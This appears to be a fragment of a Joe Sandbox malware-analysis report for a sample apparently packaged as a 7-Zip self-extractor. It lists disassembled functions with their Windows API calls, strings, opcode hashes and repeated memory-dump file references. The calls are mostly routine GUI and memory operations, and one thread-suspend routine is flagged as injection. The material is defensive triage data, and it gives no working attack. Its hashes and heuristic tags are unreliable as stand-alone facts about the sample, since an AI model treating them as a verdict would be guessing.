Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystemmemset
String ID: Edit
API String ID: 1904772019-554135844
Opcode ID: 0be7facc3e4f8ba872de67d6a079024a8f22cb4c18f1c79b82132ec26fa154f1
Instruction ID: 8a86f020cb998119f4c04dc0e8788b762e1a6262d45705b8329d94c27ff92963
Opcode Fuzzy Hash: 0be7facc3e4f8ba872de67d6a079024a8f22cb4c18f1c79b82132ec26fa154f1
Instruction Fuzzy Hash: EB115171A40208BBDB119BE5CD49FAFBBBDEF89B04F10442AF611F6190C675AD108B29

Function 0040985F Relevance: 15.1, APIs: 10, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000032), ref: 00408F80
Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000031), ref: 00408F85
Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
Part of subcall function 00408F3F: LoadImageW.USER32(00000000), ref: 00408F91
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FD7
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FE1
Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
Part of subcall function 00408F3F: SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 0040900A
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 00409018
Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
Part of subcall function 00408F3F: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00409040

Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31

ClientToScreen.USER32(?,?), ref: 004098AE
GetWindowRect.USER32(?,?), ref: 004098C1
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 004098D9
SetWindowLongW.USER32(?,000000F0,00800000), ref: 004098EF
SetWindowLongW.USER32(?,000000EC,00000008), ref: 004098F8
GetWindowRect.USER32(?,?), ref: 00409901

Part of subcall function 00407BA4: GetDlgItem.USER32(?,?), ref: 00407BC2
Part of subcall function 00407BA4: SetWindowPos.USER32(00000000), ref: 00407BC9

GetDlgItem.USER32(?,000004B2), ref: 00409928
GetDlgItem.USER32(?,000004B2), ref: 00409935
GetWindowLongW.USER32(?,000000F0), ref: 00409942
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409951

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Window$Item$Long$HandleLoadMessageMetricsModuleRectSendSystem$ClientIconImageScreenShow
String ID:
API String ID: 1121484998-0
Opcode ID: 896a1083596387c429694cdeec32fa87b02d5184d92bc3279f9fd5c98c9e356b
Instruction ID: 9fdbf200746135bab5730a4dafb3ad07ec8a2d1c31f6c6808a3a3c7848768d2e
Opcode Fuzzy Hash: 896a1083596387c429694cdeec32fa87b02d5184d92bc3279f9fd5c98c9e356b
Instruction Fuzzy Hash: 45310171A00219BFDB11DBA9CD45EAFBBBDFF48710F104129F525F22A1CB74A9108B69

Function 00409AB1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT(?,74DF1D70,?,?,?,?,00404765,?,74DF1D70,00000000), ref: 00411C93

??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B36
_wtol.MSVCRT ref: 00409B5F
??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B70
??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409BBC
_wtol.MSVCRT ref: 00409BE5
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00409E33,?,0041E7B8), ref: 00409BF0
??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409C02

Part of subcall function 004119E1: memcpy.MSVCRT(?,00000000,DA,DA,.\/,?,00000000,00409BAE,00000002,-00000002,?,?,0041E844,00000000), ref: 00411A0F

Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA

Strings

.\/, xrefs: 00409AC8

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$memcpy$_wtol$??2@
String ID: .\/
API String ID: 211236615-1884134905
Opcode ID: 99e9612978a03b7b9cc33154d1e6ca788a3612bce54da366c8f2b9a248262d29
Instruction ID: 0b6a9690c019190aaa6ec8925b5ba1fe496bdf8c1da3795196df282918bb7362
Opcode Fuzzy Hash: 99e9612978a03b7b9cc33154d1e6ca788a3612bce54da366c8f2b9a248262d29
Instruction Fuzzy Hash: 1C41A331A04106ABCB15EF69DC919EEB7B5FF14318B14843EE512B72E2EB78AC41C748

Function 00404048 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 004117A8: ??2@YAPAXI@Z.MSVCRT(?,?,00920F20,00000000,?,00404066,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 004117CA
Part of subcall function 004117A8: ??3@YAXPAX@Z.MSVCRT(00920F20,?,?,00920F20,00000000,?,00404066,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 004117D4

Part of subcall function 0041170C: memcpy.MSVCRT(?,?,?,?,?,00920F20,00000000,00404083,?,00920F20,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 0041172D

??3@YAXPAX@Z.MSVCRT(?,?,?,00920F20,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 00404090
??3@YAXPAX@Z.MSVCRT(?,?,-00000001,?,?,?,00920F20,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00920F20,00000000), ref: 004040B1
wsprintfA.USER32 ref: 004040D5
wsprintfA.USER32 ref: 00404102

Strings

;!@Install@!UTF-8!, xrefs: 00404057
:Language:%u, xrefs: 004040FC
:%hs, xrefs: 004040CF
;!@InstallEnd@!, xrefs: 00404069

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$wsprintf$??2@memcpy
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 1376779256-695273242
Opcode ID: c8f8111b7421c4f5469c19c34ddd9f84d76b7a4cb28d77ac7facfbb57728b8b2
Instruction ID: f21a7fe07a8f386c91366acc762034fd49372255a28dee344885964aedd3aa00
Opcode Fuzzy Hash: c8f8111b7421c4f5469c19c34ddd9f84d76b7a4cb28d77ac7facfbb57728b8b2
Instruction Fuzzy Hash: 83218775A00109ABDB05F7A5D882AFE77BE9F44305F24402BF601B3292CF385E8497A9

Function 00407894 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 004078A8
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004078BB
GetDlgItem.USER32(?,000004B4), ref: 004078C5
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004078CD
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004078DD
GetDlgItem.USER32(?,?), ref: 004078E6
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004078EE
GetDlgItem.USER32(?,?), ref: 004078F7
SetFocus.USER32(00000000,?,?,00000000,0040851A,000004B3,00000000,?,000004B3), ref: 004078FA

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 6496da3c9c0f305d28eaa89951ba916d2429e6ba680465666632d837b6b77d3e
Instruction ID: 223abb1aad09d6feda2c47f27d25d20709fdb3fcd92210378734137cee04cabe
Opcode Fuzzy Hash: 6496da3c9c0f305d28eaa89951ba916d2429e6ba680465666632d837b6b77d3e
Instruction Fuzzy Hash: 37F04F712403087BEA212B61DD86F5BBB5EEF85B54F018425F750650F0CBB7EC209A29

Function 00408946 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040897E

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38

GetDlgItem.USER32(?,000004B8), ref: 004089A2
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004089AF
wsprintfW.USER32 ref: 004089CF
GetDlgItem.USER32(?,000004B5), ref: 004089ED
??3@YAXPAX@Z.MSVCRT(?), ref: 00408A7B

Strings

%d%%, xrefs: 004089C9

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??2@??3@Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@memcpywsprintf
String ID: %d%%
API String ID: 3036602612-1518462796
Opcode ID: 78bbb3e831907e591ee398b5dbdb869b2610e4328640572f2c36b6117cf16983
Instruction ID: 897cffd7501da61c07280fb0c04fd43b1710295bd97e9baaaef8b47ade3b7e37
Opcode Fuzzy Hash: 78bbb3e831907e591ee398b5dbdb869b2610e4328640572f2c36b6117cf16983
Instruction Fuzzy Hash: 8341A375900704BFDB15ABA1CD45EDAB7B9FF08304F10842EFA42662E1DB39E950CB58

Function 00409DFD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68

Part of subcall function 00409AB1: ??3@YAXPAX@Z.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B36
Part of subcall function 00409AB1: _wtol.MSVCRT ref: 00409B5F
Part of subcall function 00409AB1: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00409E33,?,0041E7B8), ref: 00409BF0

??3@YAXPAX@Z.MSVCRT(?,?,0041E7B8), ref: 00409E3D
wsprintfW.USER32 ref: 00409E8C
??3@YAXPAX@Z.MSVCRT(?,00000000,?), ref: 00409EAD
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?), ref: 00409EC8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?), ref: 00409ED0

Strings

.%03u, xrefs: 00409E5D, 00409E8A

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@_wtolwsprintf
String ID: .%03u
API String ID: 2619731350-3746577511
Opcode ID: c57c0ca734d4a9ba290237b44851dc12d51ea165ec7524e85ad6be04a4cecdb0
Instruction ID: 700b262c2caaefa25544a4da0f9a64c534e6180d5fa040a2be027d4297a76f61
Opcode Fuzzy Hash: c57c0ca734d4a9ba290237b44851dc12d51ea165ec7524e85ad6be04a4cecdb0
Instruction Fuzzy Hash: 0C311A71504209AFCF04EF65D8518EE3BB9EF04354B14402BFD15922A2EB39ED85CB98

Function 00407AED Relevance: 12.1, APIs: 8, Instructions: 66COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00407AFD
GetSystemMetrics.USER32(0000000B), ref: 00407B19
GetSystemMetrics.USER32(0000003D), ref: 00407B22
GetSystemMetrics.USER32(0000003E), ref: 00407B29
SelectObject.GDI32(?,?), ref: 00407B44
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407B5F
SelectObject.GDI32(?,?), ref: 00407B85
ReleaseDC.USER32(?,?), ref: 00407B94

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 2de4bb473bfb4b8f909a57e36c0b108e7016f7be85cc3fde936b1bc80fa66e5b
Instruction ID: c6efab504cd997bbd87537fcada5a97682737a4c05f62cea40a671b0dd12ad2f
Opcode Fuzzy Hash: 2de4bb473bfb4b8f909a57e36c0b108e7016f7be85cc3fde936b1bc80fa66e5b
Instruction Fuzzy Hash: 53213871900209EFCB11DFA5DD44A9EBFF4EF08364F10C46AE829A62A0C731AA54DF51

Function 0040B900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B959
??2@YAPAXI@Z.MSVCRT(?,?,?,00000000,?), ref: 0040B980
memcpy.MSVCRT(00000000,?,?,?,?,00000000,?), ref: 0040B993
memcpy.MSVCRT(?,?,?,00000000,?,?,?,?,00000000,?), ref: 0040B9A6
??3@YAXPAX@Z.MSVCRT(00000000,?), ref: 0040BA5E

Strings

gj, xrefs: 0040BA54

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: memcpy$??2@??3@memset
String ID: gj
API String ID: 1510051167-4203073231
Opcode ID: 2871064e199d4175bef4eae133a05c08befcb89f5fc3f6546767ca85b84b6112
Instruction ID: d88508602b6957b794b8bf8d319cc32ba67a487d5ed6ee7fd98696191516abac
Opcode Fuzzy Hash: 2871064e199d4175bef4eae133a05c08befcb89f5fc3f6546767ca85b84b6112
Instruction Fuzzy Hash: 34418CB1A043009FC320EF65C88096BB7E5FB99718F144E2EE4D697752E734E949CB89

Function 00401B0B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringwindowCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00401B5D
wsprintfW.USER32 ref: 00401B7B
lstrcatW.KERNEL32(?,?), ref: 00401B8E
MessageBoxW.USER32(00000000,?,00000000,00000000), ref: 00401BBF
ExitProcess.KERNEL32 ref: 00401BD9

Strings

0x%p, xrefs: 00401B75

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: wsprintf$ExitMessageProcesslstrcat
String ID: 0x%p
API String ID: 1920160435-1745605757
Opcode ID: de6fc8d45903a09760ad9a5220580b1c83e0b5bb66eb900d9d32d6c52b165c1f
Instruction ID: 21ff27a6a0f5ea301036ba6721b670bc4eb5db3d4988dc935fe7745def954242
Opcode Fuzzy Hash: de6fc8d45903a09760ad9a5220580b1c83e0b5bb66eb900d9d32d6c52b165c1f
Instruction Fuzzy Hash: 7F219975901208AFD720DFB4DD85EDA77BCEF04304F0044BAE611A21D1EB78BE548B6A

Function 00407F86 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00407FBB
GetDC.USER32(00000000), ref: 00407FC6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407FD2
MulDiv.KERNEL32(?,00000048,00000000), ref: 00407FE1
ReleaseDC.USER32(00000000,?), ref: 00407FEF
GetModuleHandleW.KERNEL32(00000000), ref: 00408017
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00007744), ref: 00408049

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystem
String ID:
API String ID: 3212456201-0
Opcode ID: d52d7d66d1777c6683a19ab09cc34ad267647d5eb631a79ac1977f9ea0d9fe45
Instruction ID: 0d6cfd111af944fba9a3d93ccc4bb6b201ee0ba3342a1467b8569908ac4f5c69
Opcode Fuzzy Hash: d52d7d66d1777c6683a19ab09cc34ad267647d5eb631a79ac1977f9ea0d9fe45
Instruction Fuzzy Hash: 8921C331901258AFDB319F61DC48FEB7BBCEB89751F0040AAF909B2291DB344E80CB65

Function 00408B72 Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 00408B8C
KillTimer.USER32(?,00000001), ref: 00408B9D
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408BC8
SuspendThread.KERNEL32(000002E0), ref: 00408BE1
ResumeThread.KERNEL32(000002E0), ref: 00408BFF
EndDialog.USER32(?,00000000), ref: 00408C21

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
